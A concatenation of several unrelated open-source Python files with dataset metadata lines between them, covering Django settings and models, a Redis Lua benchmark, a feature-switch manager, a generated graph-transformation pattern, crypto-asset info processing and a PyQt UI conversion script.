router.register(r'search/courses', search.rest.CourseSearchViewSet, basename="search-courses")
router.register(r'feed', www.rest.FeedViewSet, basename="feed")
router.register(r'me', users.rest.Me, basename="users-me")
router.register(r'notifications', notifications.rest.NotificationsViewSet, basename="notifications")
router.register(r'me/actions', www.rest.SelfFeedViewSet, basename="user-actions")
router.register(r'tree', catalog.rest.Tree, basename="catalog-tree")
urlpatterns = router.urls
| agpl-3.0 | 402,545,330,675,040,000 | 34.807692 | 100 | 0.762084 | false |
pombredanne/django-bulbs | example/settings.py | 1 | 2779 | import os
MODULE_ROOT = os.path.dirname(os.path.realpath(__file__))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:'
}
}
USE_TZ = True,
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
TEMPLATE_DIRS = (os.path.join(MODULE_ROOT, 'templates'),)
INSTALLED_APPS = (
# django modules
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
# third parties
"djbetty",
"djes",
"rest_framework",
"polymorphic",
# local apps
"bulbs.api",
"bulbs.campaigns",
"bulbs.feeds",
"bulbs.redirects",
"bulbs.cms_notifications",
"bulbs.content",
"bulbs.contributions",
"bulbs.promotion",
"bulbs.special_coverage",
"bulbs.sections",
# local testing apps
"example.testcontent",
)
ROOT_URLCONF = "example.urls"
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.core.context_processors.tz",
"django.contrib.messages.context_processors.messages",
"django.core.context_processors.request"
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'bulbs.promotion.middleware.PromotionMiddleware'
)
CELERY_ALWAYS_EAGER = True
CELERY_EAGER_PROPAGATES_EXCEPTIONS = True
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.SessionAuthentication',
)
}
SECRET_KEY = "no-op"
ES_DISABLED = False
ES_URLS = ['http://localhost:9200']
ES_INDEX = "django-bulbs"
ES_INDEX_SETTINGS = {
"django-bulbs": {
"index": {
"analysis": {
"filter": {
"autocomplete_filter": {
"type": "edge_ngram",
"min_gram": 1,
"max_gram": 20
}
},
"analyzer": {
"autocomplete": {
"type": "custom",
"tokenizer": "standard",
"filter": [
"lowercase",
"autocomplete_filter"
]
}
}
}
}
}
}
| mit | 1,383,098,583,233,259,800 | 24.263636 | 65 | 0.56783 | false |
pombredanne/discern | examples/problem_grader/grader/models.py | 1 | 5156 | from django.db import models
from django.contrib.auth.models import User
from django.forms.models import model_to_dict
from django.db.models.signals import post_save, pre_save
import random
import string
from django.conf import settings
import requests
import json
import logging
log= logging.getLogger(__name__)
class Rubric(models.Model):
"""
The rubric object is a way to locally store data about rubric options.
Each rubric is associated with a problem object stored on the API side.
"""
#Each rubric is specific to a problem and a user.
associated_problem = models.IntegerField()
user = models.ForeignKey(User)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
def get_scores(self):
"""
Calculate the final score for a given rubric.
"""
scores = []
all_scores = []
final_score=0
max_score = 0
options = self.get_rubric_dict()
for option in options:
#Add to all_scores for each of the scores
all_scores.append(option['option_points'])
#If the student was marked as correct for a given option, add it to the score
if option['selected']:
scores.append(option['option_points'])
if len(scores)>0:
final_score = sum(scores)
if len(all_scores)>0:
max_score = sum(all_scores)
return {
'score' : final_score,
'max_score' : max_score
}
def get_rubric_dict(self):
"""
Get the rubric in dictionary form.
"""
options = []
#Bundle up all of the rubric options
option_set = self.rubricoption_set.all().order_by('id')
for option in option_set:
options.append(model_to_dict(option))
return options
class RubricOption(models.Model):
"""
Each rubric has multiple options
"""
#Associate options with rubrics
rubric = models.ForeignKey(Rubric)
#Number of points the rubric option is worth
option_points = models.IntegerField()
#Text to show to users for this option
option_text = models.TextField()
#Whether or not this option is selected (ie marked correct)
selected = models.BooleanField(default=False)
class UserProfile(models.Model):
"""
Every user has a profile. Used to store additional fields.
"""
user = models.OneToOneField(User)
#Api key
api_key = models.TextField(default="")
#Api username
api_user = models.TextField(default="")
#whether or not an api user has been created
api_user_created = models.BooleanField(default=False)
def get_api_auth(self):
"""
Returns the api authentication dictionary for the given user
"""
return {
'username' : self.api_user,
'api_key' : self.api_key
}
def create_user_profile(sender, instance, created, **kwargs):
"""
Creates a user profile based on a signal from User when it is created
"""
#Create a userprofile if the user has just been created, don't if not.
if created:
profile, created = UserProfile.objects.get_or_create(user=instance)
else:
return
#If a userprofile was not created (gotten instead), then don't make an api user
if not created:
return
#Create a random password for the api user
random_pass = ''.join([random.choice(string.digits + string.letters) for i in range(0, 15)])
#Data we will post to the api to make a user
data = {
'username' : instance.username,
'password' : random_pass,
'email' : instance.email
}
headers = {'content-type': 'application/json'}
#Now, let's try to get the schema for the create user model.
create_user_url = settings.FULL_API_START + "createuser/"
counter = 0
status_code = 400
#Try to create the user at the api
while status_code==400 and counter<2 and not instance.profile.api_user_created:
try:
#Post our information to try to create a user
response = requests.post(create_user_url, data=json.dumps(data),headers=headers)
status_code = response.status_code
#If a user has been created, store the api key locally
if status_code==201:
instance.profile.api_user_created = True
response_data = json.loads(response.content)
instance.profile.api_key = response_data['api_key']
instance.profile.api_user = data['username']
instance.profile.save()
except:
log.exception("Could not create an API user!")
instance.profile.save()
counter+=1
#If we could not create a user in the first pass through the loop, add to the username to try to make it unique
data['username'] += random.choice(string.digits + string.letters)
post_save.connect(create_user_profile, sender=User)
#Maps the get_profile() function of a user to an attribute profile
User.profile = property(lambda u: u.get_profile())
| agpl-3.0 | 7,535,211,253,820,330,000 | 32.480519 | 119 | 0.632661 | false |
mabotech/mabo.io | py/AK/test/redis_lua000.py | 1 | 1801 | # -*- coding: utf-8 -*-
"""
redis lua
redis eval, notyify in lua script
"""
import time
import redis
def main(key, val, key2, val2):
# connection pool
r = redis.Redis(host='localhost', port=6379, db=5)
d = {"a":"v1"}
"""
eval("lua script","number of kkeys", keys[],argv[])
KEYS[1]
ARGV[1]
compare value
update value when change
create job to update db when value change
set heartbeat pre tag
"""
lua_code = """if redis.call("EXISTS", KEYS[1]) == 1 then
-- redis.call("SET", "ST", ARGV[3])
-- redis.call("LPUSH", "c1","chan1")
-- redis.call("PUBLISH", "c1","new")
--
local payload = redis.call("GET", KEYS[1])
if payload == ARGV[1] then
return "same"
else
redis.call("SET", KEYS[1],ARGV[1])
redis.call("SET", KEYS[2],ARGV[2])
redis.call("LPUSH", "c1","chan2")
return payload -- return old val
end
else
redis.call("SET", KEYS[1],ARGV[1])
redis.call("SET", KEYS[2],ARGV[2])
redis.call("LPUSH", "c1","chan2")
return nil
end"""
#.format(**d)
#print(lua_code)
#benchmark
"""
0.22 ms
4545 times/second
"""
t1 = time.time()
stamp = t1*1000
val2 = t1*1000
n = 1
for i in xrange(0, n):
v = r.eval(lua_code, 2, key, key2, val, val2, stamp)
t2 = time.time()
t = (t2-t1)*1000/n
print("%sms" %(t))
#print(1000/t)
print(v)
h = r.script_load(lua_code)
print h
#print dir(r)
if __name__ == "__main__":
key = "y:a:c"
val = "10.20"
key2 = "y:a:c_st"
val2 = time.time()
main(key, val, key2, val2) | mit | -3,571,517,743,080,625,000 | 17.770833 | 61 | 0.481954 | false |
switchboardpy/switchboard | switchboard/manager.py | 1 | 7753 | """
switchboard.manager
~~~~~~~~~~~~~~~~
:copyright: (c) 2015 Kyle Adams.
:license: Apache License 2.0, see LICENSE for more details.
"""
import logging
from .base import ModelDict
from .models import (
Switch,
DISABLED, SELECTIVE, GLOBAL, INHERIT,
INCLUDE, EXCLUDE,
)
from .proxy import SwitchProxy
from .settings import settings, Settings
log = logging.getLogger(__name__)
# These are (mostly) read-only module variables since we want it shared among
# any and all threads. The only exception to read-only is when they are
# populated on Switchboard startup (i.e., operator.register()).
registry = {}
registry_by_namespace = {}
def nested_config(config):
cfg = {}
token = 'switchboard.'
for k, v in config.iteritems():
if k.startswith(token):
cfg[k.replace(token, '')] = v
return cfg
def configure(config={}, datastore=None, nested=False):
"""
Useful for when you need to control Switchboard's setup
"""
if nested:
config = nested_config(config)
# Re-read settings to make sure we have everything.
# XXX It would be really nice if we didn't need to do this.
Settings.init(**config)
if datastore:
Switch.ds = datastore
# Register the builtins
__import__('switchboard.builtins')
class SwitchManager(ModelDict):
DISABLED = DISABLED
SELECTIVE = SELECTIVE
GLOBAL = GLOBAL
INHERIT = INHERIT
INCLUDE = INCLUDE
EXCLUDE = EXCLUDE
def __init__(self, *args, **kwargs):
# Inject args and kwargs that are known quantities; the SwitchManager
# will always deal with the Switch model and so on.
new_args = [Switch]
for a in args:
new_args.append(a)
kwargs['key'] = 'key'
kwargs['value'] = 'value'
self.result_cache = None
self.context = {}
super(SwitchManager, self).__init__(*new_args, **kwargs)
def __unicode__(self): # pragma: nocover
return "<%s: %s (%s)>" % (self.__class__.__name__,
getattr(self, 'model', ''),
registry.values())
def __getitem__(self, key):
"""
Returns a SwitchProxy, rather than a Switch. It allows us to
easily extend the Switches method and automatically include our
manager instance.
"""
return SwitchProxy(self, super(SwitchManager, self).__getitem__(key))
def with_result_cache(func):
"""
Decorator specifically for is_active. If self.result_cache is set to a {}
the is_active results will be cached for each set of params.
"""
def inner(self, *args, **kwargs):
dic = self.result_cache
cache_key = None
if dic is not None:
cache_key = (args, tuple(sorted(kwargs.items())))
try:
result = dic.get(cache_key)
except TypeError as e: # not hashable
log.debug('Switchboard result cache not active for this "%s" check due to: %s within args: %s',
args[0], e, repr(cache_key)[:200])
cache_key = None
else:
if result is not None:
return result
result = func(self, *args, **kwargs)
if cache_key is not None:
dic[cache_key] = result
return result
return inner
@with_result_cache
def is_active(self, key, *instances, **kwargs):
"""
Returns ``True`` if any of ``instances`` match an active switch.
Otherwise returns ``False``.
>>> operator.is_active('my_feature', request) #doctest: +SKIP
"""
try:
default = kwargs.pop('default', False)
# Check all parents for a disabled state
parts = key.split(':')
if len(parts) > 1:
child_kwargs = kwargs.copy()
child_kwargs['default'] = None
result = self.is_active(':'.join(parts[:-1]), *instances,
**child_kwargs)
if result is False:
return result
elif result is True:
default = result
try:
switch = self[key]
except KeyError:
# switch is not defined, defer to parent
return default
if switch.status == GLOBAL:
return True
elif switch.status == DISABLED:
return False
elif switch.status == INHERIT:
return default
conditions = switch.value
# If no conditions are set, we inherit from parents
if not conditions:
return default
instances = list(instances) if instances else []
instances.extend(self.context.values())
# check each switch to see if it can execute
return_value = False
for namespace, condition in conditions.iteritems():
condition_set = registry_by_namespace.get(namespace)
if not condition_set:
continue
result = condition_set.has_active_condition(condition,
instances)
if result is False:
return False
elif result is True:
return_value = True
except:
log.exception('Error checking if switch "%s" is active', key)
return_value = False
# there were no matching conditions, so it must not be enabled
return return_value
def register(self, condition_set):
"""
Registers a condition set with the manager.
>>> condition_set = MyConditionSet() #doctest: +SKIP
>>> operator.register(condition_set) #doctest: +SKIP
"""
if callable(condition_set):
condition_set = condition_set()
registry[condition_set.get_id()] = condition_set
registry_by_namespace[condition_set.get_namespace()] = condition_set
def unregister(self, condition_set):
"""
Unregisters a condition set with the manager.
>>> operator.unregister(condition_set) #doctest: +SKIP
"""
if callable(condition_set):
condition_set = condition_set()
registry.pop(condition_set.get_id(), None)
registry_by_namespace.pop(condition_set.get_namespace(), None)
def get_condition_set_by_id(self, switch_id):
"""
Given the identifier of a condition set (described in
ConditionSet.get_id()), returns the registered instance.
"""
return registry[switch_id]
def get_condition_sets(self):
"""
Returns a generator yielding all currently registered
ConditionSet instances.
"""
return registry.itervalues()
def get_all_conditions(self):
"""
Returns a generator which yields groups of lists of conditions.
>>> for set_id, label, field in operator.get_all_conditions(): #doctest: +SKIP
>>> print "%(label)s: %(field)s" % (label, field.label) #doctest: +SKIP
"""
cs = self.get_condition_sets()
for condition_set in sorted(cs, key=lambda x: x.get_group_label()):
group = unicode(condition_set.get_group_label())
for field in condition_set.fields.itervalues():
yield condition_set.get_id(), group, field
auto_create = getattr(settings, 'SWITCHBOARD_AUTO_CREATE', True)
operator = SwitchManager(auto_create=auto_create)
| apache-2.0 | -1,019,915,879,707,345,900 | 32.562771 | 115 | 0.559267 | false |
levilucio/SyVOLT | t_core/HTopClass2TableNAC0.py | 1 | 8862 |
from core.himesis import Himesis, HimesisPreConditionPatternNAC
import cPickle as pickle
from uuid import UUID
class HTopClass2TableNAC0(HimesisPreConditionPatternNAC):
def __init__(self, LHS):
"""
Creates the himesis graph representing the AToM3 model HTopClass2TableNAC0.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HTopClass2TableNAC0, self).__init__(name='HTopClass2TableNAC0', num_nodes=3, edges=[], LHS=LHS)
# Add the edges
self.add_edges([(1, 0), (0, 2)])
# Set the graph attributes
self["mm__"] = pickle.loads("""(lp1
S'MT_pre__CD2RDBMSMetaModel'
p2
aS'MoTifRule'
p3
a.""")
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the NAC have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True forbids the rule from being applied,
# returning False enables the rule to be applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = UUID('d74c9eae-e470-4aa6-8817-2e15a1b64aab')
# Set the node attributes
self.vs[0]["MT_subtypeMatching__"] = False
self.vs[0]["MT_label__"] = """3"""
self.vs[0]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[0]["mm__"] = """MT_pre__Parent"""
self.vs[0]["MT_dirty__"] = False
self.vs[0]["GUID__"] = UUID('94914a38-3999-44e8-8ecc-1e356a6b3e23')
self.vs[1]["MT_subtypeMatching__"] = False
self.vs[1]["MT_pre__is_persistent"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_label__"] = """1"""
self.vs[1]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[1]["mm__"] = """MT_pre__Clazz"""
self.vs[1]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_dirty__"] = False
self.vs[1]["GUID__"] = UUID('a2616a97-3c66-4aa2-928f-52a37b14147b')
self.vs[2]["MT_subtypeMatching__"] = False
self.vs[2]["MT_pre__is_persistent"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_label__"] = """2"""
self.vs[2]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[2]["mm__"] = """MT_pre__Clazz"""
self.vs[2]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_dirty__"] = False
self.vs[2]["GUID__"] = UUID('4a053f4e-83f0-474b-af5a-6e2e58e5ea12')
# Load the bridge between this NAC and its LHS
from HTopClass2TableNAC0Bridge import HTopClass2TableNAC0Bridge
self.bridge = HTopClass2TableNAC0Bridge()
def eval_is_persistent1(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name1(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_is_persistent2(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name2(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the NAC have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True forbids the rule from being applied,
# returning False enables the rule to be applied.
#===============================================================================
return True
| mit | 731,728,089,143,411,300 | 47.233333 | 117 | 0.51072 | false |
Paytokens/payblockd | lib/components/assets.py | 1 | 14549 | import os
import logging
import decimal
import base64
import json
from datetime import datetime
from lib import config, util, util_litecoin
ASSET_MAX_RETRY = 3
D = decimal.Decimal
def parse_issuance(db, message, cur_block_index, cur_block):
if message['status'] != 'valid':
return
def modify_extended_asset_info(asset, description):
"""adds an asset to asset_extended_info collection if the description is a valid json link. or, if the link
is not a valid json link, will remove the asset entry from the table if it exists"""
if util.is_valid_url(description, suffix='.json', allow_no_protocol=True):
db.asset_extended_info.update({'asset': asset},
{'$set': {
'info_url': description,
'info_status': 'needfetch',
'fetch_info_retry': 0, # retry ASSET_MAX_RETRY times to fetch info from info_url
'info_data': {},
'errors': []
}}, upsert=True)
#^ valid info_status settings: needfetch, valid, invalid, error
#additional fields will be added later in events, once the asset info is pulled
else:
db.asset_extended_info.remove({ 'asset': asset })
#remove any saved asset image data
imagePath = os.path.join(config.DATA_DIR, config.SUBDIR_ASSET_IMAGES, asset + '.png')
if os.path.exists(imagePath):
os.remove(imagePath)
tracked_asset = db.tracked_assets.find_one(
{'asset': message['asset']}, {'_id': 0, '_history': 0})
#^ pulls the tracked asset without the _id and history fields. This may be None
if message['locked']: #lock asset
assert tracked_asset is not None
db.tracked_assets.update(
{'asset': message['asset']},
{"$set": {
'_at_block': cur_block_index,
'_at_block_time': cur_block['block_time_obj'],
'_change_type': 'locked',
'locked': True,
},
"$push": {'_history': tracked_asset } }, upsert=False)
logging.info("Locking asset %s" % (message['asset'],))
elif message['transfer']: #transfer asset
assert tracked_asset is not None
db.tracked_assets.update(
{'asset': message['asset']},
{"$set": {
'_at_block': cur_block_index,
'_at_block_time': cur_block['block_time_obj'],
'_change_type': 'transferred',
'owner': message['issuer'],
},
"$push": {'_history': tracked_asset } }, upsert=False)
logging.info("Transferring asset %s to address %s" % (message['asset'], message['issuer']))
elif message['quantity'] == 0 and tracked_asset is not None: #change description
db.tracked_assets.update(
{'asset': message['asset']},
{"$set": {
'_at_block': cur_block_index,
'_at_block_time': cur_block['block_time_obj'],
'_change_type': 'changed_description',
'description': message['description'],
},
"$push": {'_history': tracked_asset } }, upsert=False)
modify_extended_asset_info(message['asset'], message['description'])
logging.info("Changing description for asset %s to '%s'" % (message['asset'], message['description']))
else: #issue new asset or issue addition qty of an asset
if not tracked_asset: #new issuance
tracked_asset = {
'_change_type': 'created',
'_at_block': cur_block_index, #the block ID this asset is current for
'_at_block_time': cur_block['block_time_obj'],
#^ NOTE: (if there are multiple asset tracked changes updates in a single block for the same
# asset, the last one with _at_block == that block id in the history array is the
# final version for that asset at that block
'asset': message['asset'],
'owner': message['issuer'],
'description': message['description'],
'divisible': message['divisible'],
'locked': False,
'total_issued': message['quantity'],
'total_issued_normalized': util_litecoin.normalize_quantity(message['quantity'], message['divisible']),
'_history': [] #to allow for block rollbacks
}
db.tracked_assets.insert(tracked_asset)
logging.info("Tracking new asset: %s" % message['asset'])
modify_extended_asset_info(message['asset'], message['description'])
else: #issuing additional of existing asset
assert tracked_asset is not None
db.tracked_assets.update(
{'asset': message['asset']},
{"$set": {
'_at_block': cur_block_index,
'_at_block_time': cur_block['block_time_obj'],
'_change_type': 'issued_more',
},
"$inc": {
'total_issued': message['quantity'],
'total_issued_normalized': util_litecoin.normalize_quantity(message['quantity'], message['divisible'])
},
"$push": {'_history': tracked_asset} }, upsert=False)
logging.info("Adding additional %s quantity for asset %s" % (
util_litecoin.normalize_quantity(message['quantity'], message['divisible']), message['asset']))
return True
def inc_fetch_retry(db, asset, max_retry=ASSET_MAX_RETRY, new_status='error', errors=[]):
asset['fetch_info_retry'] += 1
asset['errors'] = errors
if asset['fetch_info_retry'] == max_retry:
asset['info_status'] = new_status
db.asset_extended_info.save(asset)
def sanitize_json_data(data):
data['asset'] = util.sanitize_eliteness(data['asset'])
if 'description' in data: data['description'] = util.sanitize_eliteness(data['description'])
if 'website' in data: data['website'] = util.sanitize_eliteness(data['website'])
if 'pgpsig' in data: data['pgpsig'] = util.sanitize_eliteness(data['pgpsig'])
return data
def process_asset_info(db, asset, info_data):
# sanity check
assert asset['info_status'] == 'needfetch'
assert 'info_url' in asset
assert util.is_valid_url(asset['info_url'], allow_no_protocol=True) #already validated in the fetch
errors = util.is_valid_json(info_data, config.ASSET_SCHEMA)
if not isinstance(info_data, dict) or 'asset' not in info_data:
errors.append('Invalid data format')
elif asset['asset'] != info_data['asset']:
errors.append('asset field does not match asset name')
if len(errors) > 0:
inc_fetch_retry(db, asset, new_status='invalid', errors=errors)
return (False, errors)
asset['info_status'] = 'valid'
#fetch any associated images...
#TODO: parallelize this 2nd level asset image fetching ... (e.g. just compose a list here, and process it in later on)
if 'image' in info_data:
info_data['valid_image'] = util.fetch_image(info_data['image'],
config.SUBDIR_ASSET_IMAGES, asset['asset'], fetch_timeout=5)
asset['info_data'] = sanitize_json_data(info_data)
db.asset_extended_info.save(asset)
return (True, None)
def fetch_all_asset_info(db):
assets = list(db.asset_extended_info.find({'info_status': 'needfetch'}))
asset_info_urls = []
def asset_fetch_complete_hook(urls_data):
logging.info("Enhanced asset info fetching complete. %s unique URLs fetched. Processing..." % len(urls_data))
for asset in assets:
logging.debug("Looking at asset %s: %s" % (asset, asset['info_url']))
if asset['info_url']:
info_url = ('http://' + asset['info_url']) \
if not asset['info_url'].startswith('http://') and not asset['info_url'].startswith('https://') else asset['info_url']
assert info_url in urls_data
if not urls_data[info_url][0]: #request was not successful
inc_fetch_retry(db, asset, max_retry=ASSET_MAX_RETRY, errors=[urls_data[info_url][1]])
logging.warn("Fetch for asset at %s not successful: %s (try %i of %i)" % (
info_url, urls_data[info_url][1], asset['fetch_info_retry'], ASSET_MAX_RETRY))
else:
result = process_asset_info(db, asset, urls_data[info_url][1])
if not result[0]:
logging.info("Processing for asset %s at %s not successful: %s" % (asset['asset'], info_url, result[1]))
else:
logging.info("Processing for asset %s at %s successful" % (asset['asset'], info_url))
#compose and fetch all info URLs in all assets with them
for asset in assets:
if not asset['info_url']: continue
if asset.get('disabled', False):
logging.info("ExtendedAssetInfo: Skipping disabled asset %s" % asset['asset'])
continue
#may or may not end with .json. may or may not start with http:// or https://
asset_info_urls.append(('http://' + asset['info_url']) \
if not asset['info_url'].startswith('http://') and not asset['info_url'].startswith('https://') else asset['info_url'])
asset_info_urls_str = ', '.join(asset_info_urls)
asset_info_urls_str = (asset_info_urls_str[:2000] + ' ...') if len(asset_info_urls_str) > 2000 else asset_info_urls_str #truncate if necessary
if len(asset_info_urls):
logging.info('Fetching enhanced asset info for %i assets: %s' % (len(asset_info_urls), asset_info_urls_str))
util.stream_fetch(asset_info_urls, asset_fetch_complete_hook,
fetch_timeout=10, max_fetch_size=4*1024, urls_group_size=20, urls_group_time_spacing=20,
per_request_complete_callback=lambda url, data: logging.debug("Asset info URL %s retrieved, result: %s" % (url, data)))
def get_escrowed_balances(addresses):
addresses_holder = ','.join(['?' for e in range(0,len(addresses))])
sql ='''SELECT (source || '_' || give_asset) AS source_asset, source AS address, give_asset AS asset, SUM(give_remaining) AS quantity
FROM orders
WHERE source IN ({}) AND status = ? AND give_asset != ?
GROUP BY source_asset'''.format(addresses_holder)
bindings = addresses + ['open', 'LTC']
results = util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT (tx0_address || '_' || forward_asset) AS source_asset, tx0_address AS address, forward_asset AS asset, SUM(forward_quantity) AS quantity
FROM order_matches
WHERE tx0_address IN ({}) AND forward_asset != ? AND status = ?
GROUP BY source_asset'''.format(addresses_holder)
bindings = addresses + ['LTC', 'pending']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT (tx1_address || '_' || backward_asset) AS source_asset, tx1_address AS address, backward_asset AS asset, SUM(backward_quantity) AS quantity
FROM order_matches
WHERE tx1_address IN ({}) AND backward_asset != ? AND status = ?
GROUP BY source_asset'''.format(addresses_holder)
bindings = addresses + ['LTC', 'pending']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT source AS address, '{}' AS asset, SUM(wager_remaining) AS quantity
FROM bets
WHERE source IN ({}) AND status = ?
GROUP BY address'''.format(config.XPT, addresses_holder)
bindings = addresses + ['open']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT tx0_address AS address, '{}' AS asset, SUM(forward_quantity) AS quantity
FROM bet_matches
WHERE tx0_address IN ({}) AND status = ?
GROUP BY address'''.format(config.XPT, addresses_holder)
bindings = addresses + ['pending']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT tx1_address AS address, '{}' AS asset, SUM(backward_quantity) AS quantity
FROM bet_matches
WHERE tx1_address IN ({}) AND status = ?
GROUP BY address'''.format(config.XPT, addresses_holder)
bindings = addresses + ['pending']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT source AS address, '{}' AS asset, SUM(wager) AS quantity
FROM rps
WHERE source IN ({}) AND status = ?
GROUP BY address'''.format(config.XPT, addresses_holder)
bindings = addresses + ['open']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT tx0_address AS address, '{}' AS asset, SUM(wager) AS quantity
FROM rps_matches
WHERE tx0_address IN ({}) AND status IN (?, ?, ?)
GROUP BY address'''.format(config.XPT, addresses_holder)
bindings = addresses + ['pending', 'pending and resolved', 'resolved and pending']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT tx1_address AS address, '{}' AS asset, SUM(wager) AS quantity
FROM rps_matches
WHERE tx1_address IN ({}) AND status IN (?, ?, ?)
GROUP BY address'''.format(config.XPT, addresses_holder)
bindings = addresses + ['pending', 'pending and resolved', 'resolved and pending']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
escrowed_balances = {}
for order in results:
if order['address'] not in escrowed_balances:
escrowed_balances[order['address']] = {}
if order['asset'] not in escrowed_balances[order['address']]:
escrowed_balances[order['address']][order['asset']] = 0
escrowed_balances[order['address']][order['asset']] += order['quantity']
return escrowed_balances
| mit | -6,619,063,133,526,564,000 | 51.146953 | 159 | 0.589113 | false |
MalloyDelacroix/DownloaderForReddit | Tools/ui_converter.py | 1 | 5130 | #!/usr/bin/env python
import sys
import os
import subprocess
class Converter:
base_ui_path = os.path.relpath('Resources/ui_files')
base_out_path = os.path.relpath('DownloaderForReddit/guiresources')
def __init__(self, ui_file):
self.ui_file = ui_file
self.callable_methods = [
'about',
'add_reddit_object',
'core_settings',
'database_dialog',
'database_settings',
'display_settings',
'download_settings',
'export_wizard',
'notification_settings',
'output_settings',
'filter_input',
'filter_widget',
'main_window',
'object_info',
'object_settings',
'quick_filter_settings',
'reddit_object_dialog',
'schedule_settings',
'settings',
'update_dialog',
'invalid_dialog',
'existing_names_dialog',
]
def run(self):
if self.ui_file == 'list':
self.list_methods()
self.ui_file = input('GUI file name (or number): ')
try:
name = self.get_method()
method = getattr(self, name)
method()
print('Conversion successful')
except AttributeError:
print(f'Command not recognized. Choices are: ')
self.list_methods()
def get_method(self):
try:
index = int(self.ui_file)
return self.callable_methods[index]
except ValueError:
return self.ui_file
def list_methods(self):
for x, y in enumerate(self.callable_methods):
print(f'{x}: {y}')
def convert(self, name, *sub_paths):
original = os.getcwd()
os.chdir(os.path.dirname(original)) # change directories so that all file paths in created file are correct
in_path = self.get_in_path(name, *sub_paths)
out_path = self.get_out_path(name, *sub_paths)
command = f'pyuic5 {in_path} -o {out_path}'
# print(command)
subprocess.run(command)
os.chdir(original)
